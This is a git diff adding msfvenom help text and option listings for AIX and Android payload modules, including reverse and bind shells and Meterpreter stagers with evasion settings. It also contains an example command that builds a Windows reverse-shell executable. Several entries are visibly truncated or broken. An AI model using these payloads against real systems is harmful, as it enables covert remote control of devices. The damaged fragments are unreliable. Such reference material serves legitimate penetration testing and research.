diff --git a/msfvenom/help.txt b/msfvenom/help.txt index e69de29..90ec08b 100644 --- a/msfvenom/help.txt +++ b/msfvenom/help.txt 
@@ -0,0 +1,32 @@ +MsfVenom - a Metasploit standalone payload generator. +Also a replacement for msfpayload and msfencode. +Usage: /usr/bin/msfvenom [options] +Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe + +Options: + -l, --list List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all + -p, --payload Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom + --list-options List --payload 's standard, advanced and evasion options + -f, --format Output format (use --list formats to list) + -e, --encoder The encoder to use (use --list encoders to list) + --service-name The service name to use when generating a service binary + --sec-name The new section name to use when generating large Windows binaries. Default: random 4-character alpha string + --smallest Generate the smallest possible payload using all available encoders + --encrypt The type of encryption or encoding to apply to the shellcode (use --list encrypt to list) + --encrypt-key A key to be used for --encrypt + --encrypt-iv An initialization vector for --encrypt + -a, --arch The architecture to use for --payload and --encoders (use --list archs to list) + --platform The platform for --payload (use --list platforms to list) + -o, --out Save the payload to a file + -b, --bad-chars Characters to avoid example: '\x00\xff' + -n, --nopsled Prepend a nopsled of [length] size on to the payload + --pad-nops Use nopsled size specified by -n as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length) + -s, --space The maximum size of the resulting payload + --encoder-space The maximum size of the encoded payload (defaults to the -s value) + -i, --iterations The number of times to encode the payload + -c, --add-code Specify an additional win32 shellcode file to include + -x, --template Specify a custom executable file to use as a template + -k, 
--keep Preserve the --template behaviour and inject the payload as a new thread + -v, --var-name Specify a custom variable name to use for certain output formats + -t, --timeout The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) + -h, --help Show this message diff --git a/msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt b/msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt new file mode 100644 index 0000000..fb075e5 --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt @@ -0,0 +1,32 @@ + + Name: AIX Command Shell, Bind TCP Inline + Module: payload/aix/ppc/shell_bind_tcp + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 264 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/aix-ppc-shell_find_port.txt b/msfvenom/payload_options/aix-ppc-shell_find_port.txt new file mode 100644 index 0000000..b8abcbe --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_find_port.txt 
@@ -0,0 +1,31 @@ + + Name: AIX Command Shell, Find Port Inline + Module: payload/aix/ppc/shell_find_port + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 220 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version +CPORT 64342 no The local client port + +Description: + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/aix-ppc-shell_interact.txt b/msfvenom/payload_options/aix-ppc-shell_interact.txt new file mode 100644 index 0000000..a0d0490 --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_interact.txt 
@@ -0,0 +1,30 @@ + + Name: AIX execve Shell for inetd + Module: payload/aix/ppc/shell_interact + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 56 + Rank: Normal + +Provided by: + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version + +Description: + Simply execve /bin/sh (for inetd programs) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt b/msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt new file mode 100644 index 0000000..c3e641d --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt 
@@ -0,0 +1,39 @@ + + Name: AIX Command Shell, Reverse TCP Inline + Module: payload/aix/ppc/shell_reverse_tcp + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 204 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter-reverse_http.txt b/msfvenom/payload_options/android-meterpreter-reverse_http.txt new file mode 100644 index 0000000..65e2aa3 --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter-reverse_http.txt 
@@ -0,0 +1,74 @@ + + Name: Android Meterpreter, Android Reverse HTTP Stager + Module: payload/android/meterpreter/reverse_http + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/meterpreter/reverse_http: +========================= + +t.com> + OJ Reeves + anwarelmakrahy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Run a meterpreter server in Android. + + Tunnel communication over HTTP + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter-reverse_https.txt b/msfvenom/payload_options/android-meterpreter-reverse_https.txt new file mode 100644 index 0000000..9e759e2 --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter-reverse_https.txt 
@@ -0,0 +1,76 @@ + + Name: Android Meterpreter, Android Reverse HTTPS Stager + Module: payload/android/meterpreter/reverse_https + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/meterpreter/reverse_https: +========================= + +.com> + OJ Reeves + anwarelmakrahy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Run a meterpreter server in Android. + + Tunnel communication over HTTPS + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/android-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..cfa537e --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,66 @@ + + Name: Android Meterpreter, Android Reverse TCP Stager + Module: payload/android/meterpreter/reverse_tcp + Platform: Android + Arch: dalvik +Needs Admin: No + Total size: 10217 + Rank: Normal + +Provided by: + mihi + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Run a meterpreter server in Android. + + Connect back stager + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter_reverse_http.txt b/msfvenom/payload_options/android-meterpreter_reverse_http.txt new file mode 100644 index 0000000..8a3485e --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter_reverse_http.txt 
@@ -0,0 +1,58 @@ + + Name: Android Meterpreter Shell, Reverse HTTP Inline + Module: payload/android/meterpreter_reverse_http + Platform: Android + Arch: dalvik +Needs Admin: No + +Evasion options for payload/android/meterpreter_reverse_http: +========================= + +g Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Connect back to attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter_reverse_https.txt b/msfvenom/payload_options/android-meterpreter_reverse_https.txt new file mode 100644 index 0000000..3f1959b --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter_reverse_https.txt 
@@ -0,0 +1,60 @@ + + Name: Android Meterpreter Shell, Reverse HTTPS Inline + Module: payload/android/meterpreter_reverse_https + Platform: Android + Arch: dalvik +Needs Admin: No + +Evasion options for payload/android/meterpreter_reverse_https: +========================= + + Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Connect back to attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/android-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..362ac7d --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,54 @@ + + Name: Android Meterpreter Shell, Reverse TCP Inline + Module: payload/android/meterpreter_reverse_tcp + Platform: Android + Arch: dalvik +Needs Admin: No + Total size: 74177 + Rank: Normal + +Provided by: + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + 
PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-shell-reverse_http.txt b/msfvenom/payload_options/android-shell-reverse_http.txt new file mode 100644 index 0000000..f9806c1 --- /dev/null +++ b/msfvenom/payload_options/android-shell-reverse_http.txt 
@@ -0,0 +1,63 @@ + + Name: Command Shell, Android Reverse HTTP Stager + Module: payload/android/shell/reverse_http + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/shell/reverse_http: +========================= + +asploit.com> + anwarelmakrahy + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Spawn a piped command shell (sh). + + Tunnel communication over HTTP + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
